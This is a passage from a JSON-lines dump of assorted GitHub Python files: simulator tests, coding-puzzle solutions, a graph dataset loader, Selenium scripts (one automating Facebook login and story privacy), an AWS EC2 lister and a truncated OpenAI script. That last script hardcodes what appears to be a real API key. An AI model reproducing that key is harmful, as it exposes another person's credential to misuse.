.json文件是jbk格式的?\nparse_file(\"G:\\\\datas\\\\recommend\\\\playlistdetail.all.json\",\"G:\\\\datas\\\\recommend\\\\playlistdetail.result.txt\")\n","repo_name":"heartbeatbymoon/myPythonTest_2020","sub_path":"music_recomend_system/Data_transform.py","file_name":"Data_transform.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18390433240","text":"from pathlib import Path\n\nimport cv2\nimport matplotlib.pyplot\nimport numpy as np\nimport pytest\nfrom numpy.testing import assert_almost_equal\n\nfrom ..output import (\n OutputReproducibleFiles,\n check_overwrite,\n ensure_extension,\n ensure_path,\n)\nfrom ..output.all import (\n COCOOutput,\n FluorescenceRenderer,\n GenericMaskOutput,\n JsonPickleSerializer,\n MeshOutput,\n NoisyUnevenIlluminationPhaseContrast,\n Output,\n PlainRenderer,\n QuickAndDirtyTableDumper,\n SvgRenderer,\n TiffOutput,\n TrackMateXML,\n YOLOOutput,\n)\nfrom ..output.gt import (\n COCOEncodeRLE,\n COCOOutputStuff,\n GroundTruthOnlyCompleteCellsInImages,\n GroundTruthOutput,\n binary_to_rle,\n)\nfrom ..output.mesh import MeshCellScaleFactor\nfrom ..output.plot import PlotRenderer\nfrom ..output.render import (\n OpenCVimshow,\n RenderChannels,\n RoiOutputScaleDelta,\n RoiOutputScaleFactor,\n add_if_uneven,\n bytescale,\n cv2_has_write_support,\n get_canvas_points_for_cell,\n get_canvas_points_raw,\n new_canvas,\n render_on_canvas_matplotlib,\n scale_points_absolute,\n scale_points_relative,\n)\nfrom ..output.serialization import type2numpy\nfrom ..output.xml import TrackMateXMLExportFluorescences, TrackMateXMLExportLengthTypo\n\n\ndef test_jsonpickle(simulator, capsys):\n\n output = JsonPickleSerializer()\n output.display(simulator.simulation.world)\n\n captured = capsys.readouterr()\n\n result = captured.out.replace('\\n', '')\n expected = (\n '{\"py/object\": \"cellsium.simulation.simulator.World\", \"cells\": [{\"py/object\":'\n ' \"cellsium.cli.SizerCell\", \"lineage_history\": [0], \"id_\": 1, \"parent_id\": 0, '\n '\"birth_time\": 0.0, \"angle\": 3.6942842669518385, \"position\": '\n '[17.90727229572483, 29.944407189601154], \"bend_overall\": 0.01753978255362451,'\n ' \"bend_upper\": -0.04126808565523994, \"bend_lower\": -0.09614075306364522, '\n '\"length\": 1.636246698756115, \"width\": 0.9548930351446809, \"division_size\": '\n '2.898390206023354, \"elongation_rate\": 1.5}], \"boundaries\": [], '\n '\"cells_to_add\": [], \"cells_to_remove\": []}'\n )\n\n assert result == expected\n\n\ndef test_type2numpy_nomaxlen():\n assert type2numpy([1, 2]) == '(2,)i8'\n\n\ndef test_type2numpy_nonsense():\n with pytest.raises(RuntimeError):\n type2numpy(type2numpy)\n\n\ndef test_qadtd_empty(simulator):\n for cell in simulator.simulation.world.cells:\n simulator.simulation.world.remove(cell)\n\n simulator.simulation.world.commit()\n\n output = QuickAndDirtyTableDumper()\n\n assert len(output.output(simulator.simulation.world)) == 0\n\n\ndef test_svgrenderer_display(simulator):\n output = SvgRenderer()\n\n with pytest.raises(RuntimeError):\n output.display(simulator.simulation.world)\n\n\ndef test_trackmate_display(simulator):\n output = TrackMateXML()\n\n with pytest.raises(RuntimeError):\n output.display(simulator.simulation.world)\n\n\ndef test_trackmate_no_fluor(simulator, tunables, tmpdir):\n testfile = tmpdir.join('testfile.xml')\n for _ in range(2):\n simulator.step(60.0 * 60.0)\n\n with tunables((TrackMateXMLExportFluorescences, '')):\n output = TrackMateXML()\n\n output.write(simulator.simulation.world, testfile)\n\n\ndef test_trackmate_typo(simulator, tunables, tmpdir):\n testfile = tmpdir.join('testfile.xml')\n for _ in range(2):\n simulator.step(60.0 * 60.0)\n\n with tunables((TrackMateXMLExportLengthTypo, False)):\n output = TrackMateXML()\n\n output.write(simulator.simulation.world, testfile)\n\n\ndef test_trackmate_growth(simulator, tunables, tmpdir):\n testfile = tmpdir.join('testfile.xml')\n\n output = TrackMateXML()\n\n for _ in range(5):\n simulator.step(60.0 * 60.0)\n output.write(simulator.simulation.world, testfile, overwrite=True)\n\n\ndef test_gt_output(simulator):\n output = GroundTruthOutput()\n\n with pytest.raises(RuntimeError):\n output.output(simulator.simulation.world)\n\n\ndef test_gt_virtual():\n output = GroundTruthOutput()\n\n output._write_initializations(None, '')\n output._write_perform(None, '')\n\n\ndef test_yolo_off_canvas_cells(simulator, tmpdir, tunables):\n testdir = tmpdir.join('yoloout')\n\n output = YOLOOutput()\n\n simulator.step(60.0 * 60.0)\n\n # move one cell off canvas\n some_cell_position = simulator.simulation.world.cells[1].position\n some_cell_position[0] += 10000\n\n output.write(simulator.simulation.world, testdir)\n\n with tunables((GroundTruthOnlyCompleteCellsInImages, False)):\n output.write(simulator.simulation.world, testdir, overwrite=True)\n\n\ndef test_yolo_no_overwrite(simulator, tmpdir, tunables):\n with tunables((RenderChannels, 'PlainRenderer')):\n testdir = tmpdir.join('yoloout')\n\n output = YOLOOutput()\n\n output.write(simulator.simulation.world, testdir)\n\n output = YOLOOutput()\n\n with pytest.raises(RuntimeError):\n output.write(simulator.simulation.world, testdir)\n\n\ndef test_coco_no_overwrite(simulator, tmpdir, tunables):\n with tunables((RenderChannels, 'PlainRenderer')):\n\n testdir = tmpdir.join('cocoout')\n\n output = COCOOutput()\n output.write(simulator.simulation.world, testdir)\n\n output = COCOOutput()\n\n with pytest.raises(RuntimeError):\n output.write(simulator.simulation.world, testdir)\n\n\ndef test_coco_unreproducible_stuffthings(simulator, tmpdir, tunables):\n with tunables(\n (RenderChannels, 'PlainRenderer'),\n (OutputReproducibleFiles, False),\n (COCOOutputStuff, True),\n (COCOEncodeRLE, True),\n ):\n testdir = tmpdir.join('cocoout')\n\n output = COCOOutput()\n\n simulator.step(60.0 * 60.0)\n\n # move one cell off canvas\n some_cell_position = simulator.simulation.world.cells[1].position\n some_cell_position[0] += 10000\n\n output.write(simulator.simulation.world, testdir)\n\n with tunables((GroundTruthOnlyCompleteCellsInImages, False)):\n output.write(simulator.simulation.world, testdir, overwrite=True)\n\n\ndef test_genericmaskoutput_no_overwrite(simulator, tmpdir, tunables):\n with tunables((RenderChannels, 'PlainRenderer')):\n\n testdir = tmpdir.join('cocoout')\n\n output = GenericMaskOutput()\n\n output.write(simulator.simulation.world, testdir)\n\n output = GenericMaskOutput()\n\n with pytest.raises(RuntimeError):\n output.write(simulator.simulation.world, testdir)\n\n\ndef test_mesh_scale(reset_state, simulator, tmpdir, tunables):\n testfile = tmpdir.join('testfile.stl')\n\n with tunables((MeshCellScaleFactor, 1.1)):\n\n output = MeshOutput()\n\n output.write(simulator.simulation.world, file_name=str(testfile))\n\n\ndef test_mesh_output():\n output = MeshOutput()\n\n with pytest.raises(RuntimeError):\n output.display(None)\n\n\ndef test_plotrenderer_quit(simulator, monkeypatch, nop):\n monkeypatch.setattr(matplotlib.pyplot, 'ion', nop)\n monkeypatch.setattr(matplotlib.pyplot, 'show', nop)\n\n output = PlotRenderer()\n\n output.display(simulator.simulation.world)\n\n matplotlib.pyplot.close(output.fig.number)\n\n with pytest.raises(KeyboardInterrupt):\n output.display(simulator.simulation.world)\n\n\ndef test_mesh_cell_zoo(reset_state, simulator, tmpdir, add_cell_zoo):\n testfile = tmpdir.join('testfile.stl')\n\n add_cell_zoo(simulator)\n\n output = MeshOutput()\n\n output.write(simulator.simulation.world, file_name=str(testfile))\n\n\ndef test_render_debug(reset_state, simulator, tmpdir, add_cell_zoo, chdir):\n new_pwd = tmpdir.mkdir('debugout')\n testfile = tmpdir.join('testfile.png')\n\n add_cell_zoo(simulator)\n\n output = NoisyUnevenIlluminationPhaseContrast()\n output.write_debug_output = True\n\n with chdir(str(new_pwd)):\n output.write(simulator.simulation.world, file_name=str(testfile))\n\n assert len(new_pwd.listdir()) > 0\n\n\ndef test_render_bytescale_nochange():\n input_data = np.zeros((256, 256), dtype=np.uint8)\n\n assert id(bytescale(input_data)) == id(input_data)\n\n\ndef test_render_add_if_uneven():\n assert add_if_uneven(1) == 2\n assert add_if_uneven(2) == 2\n\n\ndef test_fluorescence_not_the_right_channel(\n reset_state, simulator, tmpdir, add_cell_zoo\n):\n testfile = tmpdir.join('testfile.png')\n\n add_cell_zoo(simulator)\n\n output = FluorescenceRenderer()\n output.channel = 1\n\n output.write(simulator.simulation.world, testfile)\n\n\ndef test_render_multichannel_tif(\n reset_state, simulator, tmpdir, add_cell_zoo, tunables\n):\n testfile = tmpdir.join('testfile.tif')\n\n add_cell_zoo(simulator)\n\n with tunables(\n (RenderChannels, 'NoisyUnevenIlluminationPhaseContrast, FluorescenceRenderer')\n ):\n output = TiffOutput()\n\n output.write(simulator.simulation.world, file_name=str(testfile))\n\n\ndef test_render_renderchannels_nonsense(tunables):\n assert not RenderChannels.test('foo')\n\n\ndef test_render_mock_failcv2(monkeypatch):\n def raise_cv2_error(*args, **kwargs):\n raise cv2.error()\n\n monkeypatch.setattr(cv2, 'haveImageWriter', raise_cv2_error)\n\n assert not cv2_has_write_support('.foo')\n\n\ndef test_render_scale_points_relative():\n points = np.linspace(0, 1)\n points = np.c_[points, points]\n scale_factor = 1.1\n scaled_points = scale_points_relative(points, scale_factor)\n\n assert_almost_equal(scaled_points.min(), -0.05)\n assert_almost_equal(scaled_points.max(), 1.05)\n\n\ndef test_render_scale_points_absolute_nop():\n points = np.linspace(0, 1)\n points = np.c_[points, points]\n\n scaled_points = scale_points_absolute(points)\n\n assert id(scaled_points) == id(points)\n\n\ndef test_render_get_canvas_points_for_cell(simulator, tunables):\n cell = simulator.simulation.world.cells[0]\n\n with tunables((RoiOutputScaleFactor, 1.0)):\n get_canvas_points_for_cell(cell)\n\n with tunables((RoiOutputScaleFactor, 1.1)):\n get_canvas_points_for_cell(cell)\n\n with tunables((RoiOutputScaleDelta, 0.0)):\n get_canvas_points_for_cell(cell)\n\n with tunables((RoiOutputScaleDelta, 0.1)):\n get_canvas_points_for_cell(cell)\n\n\ndef test_render_plainoutput_display_cv2(simulator, tunables, monkeypatch, nop):\n\n output = PlainRenderer()\n\n with tunables((OpenCVimshow, True)):\n monkeypatch.setattr(cv2, 'imshow', nop)\n monkeypatch.setattr(cv2, 'waitKey', nop)\n\n output.display(simulator.simulation.world)\n\n\ndef test_render_plainoutput_display_matplotlib(simulator, tunables, monkeypatch, nop):\n\n output = PlainRenderer()\n\n with tunables((OpenCVimshow, False)):\n monkeypatch.setattr(matplotlib.pyplot, 'ion', nop)\n monkeypatch.setattr(matplotlib.pyplot, 'show', nop)\n\n output.display(simulator.simulation.world)\n\n # the second call will be handled differently, hence we try it as well\n\n output.display(simulator.simulation.world)\n\n\ndef test_render_on_canvas_matplotlib_obscure_options(simulator, monkeypatch, nop):\n canvas = new_canvas()\n array_of_points = [\n get_canvas_points_raw(cell, canvas.shape[0])\n for cell in simulator.simulation.world.cells\n ]\n\n monkeypatch.setattr(matplotlib.pyplot, 'ion', nop)\n monkeypatch.setattr(matplotlib.pyplot, 'ioff', nop)\n\n monkeypatch.setattr(matplotlib.pyplot, 'isinteractive', lambda: True)\n\n render_on_canvas_matplotlib(canvas, array_of_points, over_sample=2)\n\n\ndef test_rle():\n mask = np.zeros((128, 128), dtype=bool)\n mask[32 : 32 + 64, 32 : 32 + 64] = 1\n\n result = binary_to_rle(mask)\n\n assert result.ravel().tolist() == ([4128] + ([64] * 127) + [4128])\n\n\ndef test_output_dummy():\n output = object.__new__(Output)\n output.output(None)\n output.write(None, None)\n\n with pytest.raises(RuntimeError):\n output.display(None)\n\n\ndef test_overwrite(tmpdir):\n testfile = tmpdir.join('testfile')\n testfile.write(\"Test\")\n\n with pytest.raises(RuntimeError):\n check_overwrite(str(testfile), overwrite=False)\n\n\ndef test_ensure_extension():\n assert ensure_extension('Hello{}.txt', '.txt') == 'Hello.txt'\n\n\ndef test_mkdir(tmpdir):\n p = Path(str(tmpdir)) / \"some\" / \"directories\"\n\n some_file = p / \"some_file\"\n\n assert not p.exists()\n\n ensure_path(str(some_file))\n\n assert p.exists()\n","repo_name":"modsim/CellSium","sub_path":"cellsium/tests/output_test.py","file_name":"output_test.py","file_ext":"py","file_size_in_byte":12314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40891102161","text":"\"\"\"\nTicket numbers usually consist of an even number of digits. A ticket number is considered lucky if the sum of the first half of the digits is equal to the sum of the second half.\n\nGiven a ticket number n, determine if it's lucky or not.\n\"\"\"\n\ndef isLucky(n):\n n = str(n)\n input_list = list(n)\n first = 0\n second = 0\n for i in range(len(input_list)//2):\n first +=int(input_list[i])\n for j in range(len(input_list)//2,len(input_list)):\n second += int(input_list[j])\n if first == second:\n return True\n else:\n return False\n\n","repo_name":"mherkhachatryan/CodeSignal","sub_path":"isLucky.py","file_name":"isLucky.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72944653849","text":"class Solution:\n def carPooling(self, trips: List[List[int]], capacity: int) -> bool:\n \n #print(trips)\n \n #print(capacity)\n \n farest = 0\n \n for num,start,end in trips:\n farest = max(farest, end)\n \n \n farest_space = [0] * farest\n \n #print(farest_space)\n \n for num,start,end in trips:\n for i in range(start,end):\n farest_space[i] += num\n \n if farest_space[i] > capacity:\n return False\n \n return True","repo_name":"algohell/ALGOHELL","sub_path":"1094/pgo.py","file_name":"pgo.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"10991913563","text":"class Solution:\n def diagonalSum(self, mat: List[List[int]]) -> int:\n res=0\n for i in range(len(mat)):\n res+=mat[i][i]\n mat[i][i]=-1\n \n n=len(mat)-1\n for i in range(len(mat)):\n # print(mat[i][n-i])\n if mat[i][n-i]!=-1:\n res+=mat[i][n-i]\n return res","repo_name":"raaam21/Leetcode-Solutions","sub_path":"1572-matrix-diagonal-sum/1572-matrix-diagonal-sum.py","file_name":"1572-matrix-diagonal-sum.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4459541854","text":"import os\nimport torch\nimport numpy as np\nimport pandas as pd\nfrom glob import glob\nfrom tqdm import tqdm\nimport deepchem as dc\nfrom torch_geometric.data import Dataset, Data\n\n\n\nclass GNNDataset(Dataset):\n\n def __init__(self, root, test_data=False, transform=None, pre_transform=None, pre_filter=None):\n self.test_data = test_data\n self.name = \"test\" if self.test_data else \"train\"\n self.df = pd.read_csv(os.path.join(root, \"raw\", f\"{self.name}.csv\"))\n super().__init__(root, transform, pre_transform, pre_filter)\n \n @property\n def raw_file_names(self):\n return [f\"{self.name}.csv\"]\n \n @property\n def processed_file_names(self):\n return [f\"{self.name}_{index+1}.pt\" for index in range(len(self.df))]\n \n\n def download(self):\n pass\n\n def process(self):\n featurizer = dc.feat.MolGraphConvFeaturizer(use_edges=True)\n for index, row in enumerate(tqdm(self.df.iterrows())):\n mol = featurizer.featurize(row[1][\"smiles\"])\n data = mol[0].to_pyg_graph()\n data.y = row[1][\"HIV_active\"]\n data.smiles = row[1][\"smiles\"]\n torch.save(data, \n os.path.join(self.processed_dir, f\"{self.name}_{index+1}.pt\"))\n\n def len(self):\n return len(self.df)\n\n def get(self, index):\n data = torch.load(os.path.join(self.processed_dir, f\"{self.name}_{index+1}.pt\"))\n return data\n\n\nif __name__ == '__main__':\n root_dir = \"data/\"\n train_dataset = GNNDataset(root=root_dir)\n test_dataset = GNNDataset(root=root_dir, test_data=True)\n\n print(f\"Length of training dataset : {len(train_dataset)}\")\n print(f\"Length of testing dataset : {len(test_dataset)}\")\n","repo_name":"sagnik1511/CureGraph","sub_path":"src/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"31"} +{"seq_id":"15068280378","text":"import time\nimport unittest\n\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom Pages.CasualDressPage import CasualDressPageObject\nfrom Pages.HomePage import HomePageObjects\n\n\nclass CasualDressTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Chrome(executable_path=\"C:\\Software\\chromedriver_win32\\chromedriver.exe\")\n cls.driver.implicitly_wait(2)\n cls.driver.get(\"http://automationpractice.com/index.php\")\n cls.driver.maximize_window()\n time.sleep(1)\n\n @pytest.mark.order(1)\n def test_click_casual_btn(self):\n driver = self.driver\n homePageObj = HomePageObjects(driver)\n axn = ActionChains(driver)\n axn.move_to_element(homePageObj.get_dress_tag()).perform()\n time.sleep(3)\n axn.move_to_element(homePageObj.get_casual_dress()).click().perform()\n time.sleep(2)\n\n\n @pytest.mark.order(2)\n def test_add_to_cart_validation(self):\n driver = self.driver\n driver.execute_script(\"window.scrollTo(0, 600)\")\n time.sleep(1)\n casualDressPageObj = CasualDressPageObject(driver)\n axn2 = ActionChains(driver)\n axn2.move_to_element(casualDressPageObj.hover_on_image()).perform()\n time.sleep(3)\n axn3 = ActionChains(driver)\n axn3.move_to_element(casualDressPageObj.get_add_to_cart_btn()).click().perform()\n time.sleep(2)\n\n @pytest.mark.order(3)\n def test_validate_cart_msg(self):\n driver =self.driver\n casualDressPageObj = CasualDressPageObject(driver)\n casualDressPageObj.get_cart_msg()\n print(casualDressPageObj.get_cart_msg())\n msg = 'Product successfully added to your shopping cart'\n assert msg == casualDressPageObj.get_cart_msg()\n time.sleep(5)\n\n @pytest.mark.order(4)\n def test_validate_cart_button(self):\n driver = self.driver\n casualDressPageObj = CasualDressPageObject(driver)\n button = casualDressPageObj.get_checkout_btn()\n element = WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, button))\n )\n #axn4 = ActionChains(driver)\n #axn4.move_to_element(button).click().perform()\n element.click()\n time.sleep(3)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.close()\n","repo_name":"ETyrion/Selenium_Python","sub_path":"Tests/CasualDressPageTest.py","file_name":"CasualDressPageTest.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27355705592","text":"from tkinter import *\n\n\n\ndef update_text(label, msg):\n\tdef update():\n\t\ttx = \"\"\n\t\tfor t in msg:\n\t\t\ttx += \"\\n\" + t\n\t\tlabel.config(textvariable=tx)\n\t\tlabel.after(1000, update)\n\tupdate()\n\ndef create_window(title, msg):\n\n\t# Prepara la finestra\n\tcima = Tk()\n\tF = Frame(cima)\n\tF.pack()\n\n\t# Rinomina la finestra\n\tF.master.title(title)\n\n\tlCiao = Label(F, \n\t\tjustify=LEFT,\n compound = LEFT,\n padx = 10,\n text = \"msg\")\n\tlCiao.pack(side = \"left\")\n\n\t#update_text(lCiao, msg)\n\n\t# Attiva il ciclo\n\tcima.mainloop()\n\n","repo_name":"tommasoberlose/p2p_kazaa","sub_path":"Interface.py","file_name":"Interface.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70670521687","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom window.Frame import Frame\nfrom functools import partial\nfrom functions import to_only_int, to_max_size\n\n\nclass Save(Frame):\n def __init__(self, window_tool, window_options, variables: dict):\n super().__init__(window_tool, window_options, variables, btntxt=\"Save options\")\n\n def window_options(self):\n self.variables[\"dir_path\"] = tk.StringVar(self.options_frame, value=\"\")\n self.variables[\"file_name\"] = tk.StringVar(self.options_frame, value=\"output\")\n self.variables[\"duration\"] = tk.StringVar(self.options_frame, value=\"100\")\n\n self.variables[\"duration\"].trace(\"w\", partial(self.entry_test, self.variables[\"duration\"], 5, only_int=True))\n\n label01 = tk.Label(self.options_frame, text=\"Directory\")\n entry01 = tk.Entry(self.options_frame, textvariable=self.variables[\"dir_path\"])\n btn01 = tk.Button(self.options_frame, text=\"Choose directory\", command=self.open_filedialog)\n\n label02 = tk.Label(self.options_frame, text=\"File name\")\n entry02 = tk.Entry(self.options_frame, textvariable=self.variables[\"file_name\"])\n\n duration = tk.Frame(self.options_frame)\n tk.Label(duration, text=\"duration\").grid(column=0, row=0)\n tk.Entry(duration, width=5, textvariable=self.variables[\"duration\"]).grid(column=1, row=0)\n\n self.variables[\"infinite_loop\"] = tk.IntVar()\n tk.Checkbutton(self.options_frame, text=\"Infinite loop\", variable=self.variables[\"infinite_loop\"]).pack()\n generate_button = tk.Button(self.options_frame, text=\"Save GIF\", command=self.variables[\"GifManager\"].save_gif)\n\n self.pack_all(label01, entry01, btn01, label02, entry02, duration, generate_button)\n\n def open_filedialog(self):\n self.variables[\"dir_path\"].set(filedialog.askdirectory())\n\n def entry_test(self, text_var: tk.StringVar, limit: int, a, b, c, only_int=False):\n if only_int:\n text_var.set(to_only_int(text_var.get()))\n\n text_var.set(to_max_size(text_var.get(), 5))\n","repo_name":"LMGerard/GIF_App","sub_path":"window/Save.py","file_name":"Save.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17433438837","text":"import sys\nimport krypto_vigenere_main as vigenere\n\nif len(sys.argv) == 4:\n input_file = sys.argv[1]\n key = sys.argv[2]\n output_file = sys.argv[3]\n\n V = vigenere.Viginere(key)\n V.encrypt_file(input_file, output_file)\nelif len(sys.argv) == 2:\n input_file = \"original.txt\"\n key = sys.argv[1]\n output_file = \"encrypted.txt\"\n\n V = vigenere.Viginere(key)\n V.encrypt_file(input_file, output_file)\nelse:\n print(\"Wrong Number of Arguments!\")","repo_name":"Hanno1/KryptologieLab","sub_path":"02_vigenere/vigenere_encrypt.py","file_name":"vigenere_encrypt.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27381349275","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom Crypto.Cipher import AES\nimport os\nimport time\n\n#Setting up options for the driver\noption = Options()\n\noption.add_argument(\"--disable-infobars\")\noption.add_argument(\"start-maximized\")\noption.add_argument(\"--disable-extensions\")\noption.add_experimental_option('excludeSwitches', ['enable-logging'])\n\n# Pass the argument 1 to allow and 2 to block on the \"Allow Notifications\" pop-up\noption.add_experimental_option(\"prefs\", { \n \"profile.default_content_setting_values.notifications\": 2 \n})\n\n#Creating the driver\ndriver = webdriver.Chrome(options=option, executable_path='../chromedriver.exe')\n\n#Loading the webpage\ndriver.get(\"https://www.facebook.com/stories/create/\")\nprint(driver.title)\n\n#Getting the login fields\nemail = driver.find_element_by_name(\"email\")\npassword = driver.find_element_by_name(\"pass\")\nloginButton = driver.find_element_by_name(\"login\")\n\n#Initializing password from ciphered-hash\nfpath = \"login_info.txt\"\nif (os.path.isfile(fpath) and os.path.getsize(fpath)>0):\n file = open(fpath)\n infos = []\n for line in file:\n line = line.strip()\n infos.append(line)\n emailAddress = infos[0] \n key = infos[1]\n cipherstring = infos[2]\n cipher2 = AES.new(key.encode('utf-8'), AES.MODE_CBC, 'This is an IV456'.encode('utf-8'))\n text = bytes.fromhex(cipherstring)\n original_pass = cipher2.decrypt(text).decode().lstrip()\nelse:\n emailAddress = input('Enter email address or phone number: \\n')\n original_pass = input('Enter password: \\n')\n\n#Filling the login fields\nemail.send_keys(emailAddress)\npassword.send_keys(original_pass)\nloginButton.click()\n\ntry:\n settingsButtonLabel = \"//div[@aria-label='settings']\"\n settingsButton = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, settingsButtonLabel)))\n print(\"Settings button found!\")\n settingsButton.click()\n\n try:\n customRadioClassName = \"//*[text()='Custom']\"\n WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, customRadioClassName))).click()\n print(\"'Custom' radio button found!\")\n\n try:\n #Useful method for checking if certain text exists in the webpage\n def is_text_element_exist(text):\n try:\n changeToDiffMode = \"//*[text()='{0}']\".format(text)\n WebDriverWait(driver, 2).until(EC.presence_of_element_located((By.XPATH, changeToDiffMode)))\n return True\n except TimeoutException:\n return False\n \n if is_text_element_exist('Change story privacy'):\n print('clicking change button')\n changeButtonLabel = \"//div[@aria-label='Change']\"\n driver.find_element_by_xpath(changeButtonLabel).click()\n\n try:\n selectPeopleText = \"//*[text()='Select people']\"\n WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, selectPeopleText)))\n print(\"'Select people' found!\")\n\n try:\n radioButtonClass = \"//span[@class='d2edcug0 hpfvmrgz qv66sw1b c1et5uql rrkovp55 a8c37x1j keod5gw0 nxhoafnm aigsh9s9 d3f4x2em fe6kdd0r mau55g9w c8b282yb iv3no6db jq4qci2q a3bd9o3v ekzkrbhg oo9gr5id hzawbc8m']\"\n radios = WebDriverWait(driver, 10).until(EC.presence_of_all_elements_located((By.XPATH, radioButtonClass))) \n print(\"Friend list initially loaded! \\n- \"+str(len(radios))+\" people\")\n\n # Finding the first 'friend name' on the list and clicking it\n count = 0\n firstFriendNameText = \"//*[text()='{0}']\".format(radios[count].text)\n driver.find_element_by_xpath(firstFriendNameText).click()\n dashes = \" \"\n for i in range(len(radios[count].text), 30):\n dashes+='-'\n print(str(count)+'. '+radios[count].text+dashes+' deselected')\n\n # Accessing the rest of the list by pressing 'TAB' and 'ENTER'\n success = 'unsuccessful'\n while True:\n prevElemText = driver.switch_to.active_element.find_element_by_tag_name('span').text\n # print('prevElem: '+prevElemText)\n ActionChains(driver).send_keys(Keys.TAB).perform()\n activeElem = driver.switch_to.active_element\n count+=1\n\n def is_span_element_exist(activeElem):\n try:\n activeElem.find_element_by_tag_name('span')\n return True\n except NoSuchElementException:\n return False\n\n if (is_span_element_exist(activeElem)):\n span = activeElem.find_element_by_tag_name('span')\n dashes = \" \"\n for i in range(len(span.text), 30):\n dashes+='-'\n # print(str(count)+'. '+span.text if span.text!='Save' else span.text)\n if activeElem.get_attribute('aria-checked')=='true':\n ActionChains(driver).send_keys(Keys.ENTER).perform()\n print(str(count)+'. '+span.text+dashes+' deselected')\n continue\n elif activeElem.get_attribute('aria-checked')=='false':\n print(str(count)+'. '+span.text+dashes+' already deselected')\n continue\n elif activeElem.get_attribute('aria-label')=='Save':\n # ActionChains(driver).send_keys(Keys.ENTER).perform()\n success = 'successful'\n print('Saved settings!')\n break\n else:\n print('Error loading friend list')\n break\n else:\n print('loading list...')\n time.sleep(6)\n prevFrndNameText = \"//*[text()='{0}']\".format(prevElemText)\n e = WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.XPATH, prevFrndNameText)))\n ActionChains(driver).move_to_element(e).click(e).click(e).perform()\n currentElem = driver.switch_to.active_element.find_element_by_tag_name('span').text\n print('previous element: '+currentElem)\n count-=1\n\n # for count, span in enumerate(radios):\n # print(str(count)+\". '\"+span.text+\"'\")\n \n # friendNameText = \"//*[text()='{0}']\".format(span.text)\n # # e = WebDriverWait(driver, 5).until(EC.visibility_of_element_located((By.XPATH, friendNameText)))\n # # e.click()\n\n # # actions = ActionChains(driver)\n # # actions.move_to_element(element).perform()\n # # time.sleep(1)\n # # element.click()\n # # elem = WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.XPATH, friendNameText)))\n \n\n print(\"Task Finished - \"+success)\n\n except TimeoutException:\n print(\"Radio button list error!\") \n except TimeoutException:\n print(\"No 'Select people' found!\") \n except TimeoutException:\n print(\"No 'Change Button' found!\") \n except TimeoutException:\n print(\"No radio button named 'custom' found\") \nexcept TimeoutException:\n print(\"No 'settings' button present on 'story' page\")\n\n# time.sleep(60)\n# driver.quit()\n\n\n \n\n\n","repo_name":"NazmuMasood/SeleniumFbFun","sub_path":"dummy/fblogin.py","file_name":"fblogin.py","file_ext":"py","file_size_in_byte":8616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25822168702","text":"import boto3\n\n\ndef ec2(region, ec2_running):\n ec2_client = boto3.client('ec2', region_name=region)\n reservations = ec2_client.describe_instances()['Reservations']\n\n for reservation in reservations:\n for instance in reservation['Instances']:\n state = instance['State']['Name']\n type = instance['InstanceType']\n id = instance['InstanceId']\n launch_time = instance['LaunchTime'].strftime(\"%Y-%m-%d %H:%M:%S\")\n tags = instance['Tags'] if 'Tags' in instance else []\n name = \"unnamed\"\n for tag in tags:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if state == 'running':\n instance_info = {\n 'name': name,\n 'state': state,\n 'type': type,\n 'id': id,\n 'region': region,\n 'launch_time': launch_time\n }\n ec2_running.append(instance_info)\n print('EC2 = ' + str(instance_info))\n return ec2_running\n","repo_name":"ahermassi/AWS-Resources-Patrol","sub_path":"services/ec2.py","file_name":"ec2.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70506023129","text":"import openai\nfrom personality import Personality\n\nopenai.api_key = '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'\n\nqualities = \"\"\njournal_entries = \"\"\n\nqualitiesList = ['moody', 'lashes out to close people', 'often cries']\njournalList = ['Today I had a bad day', 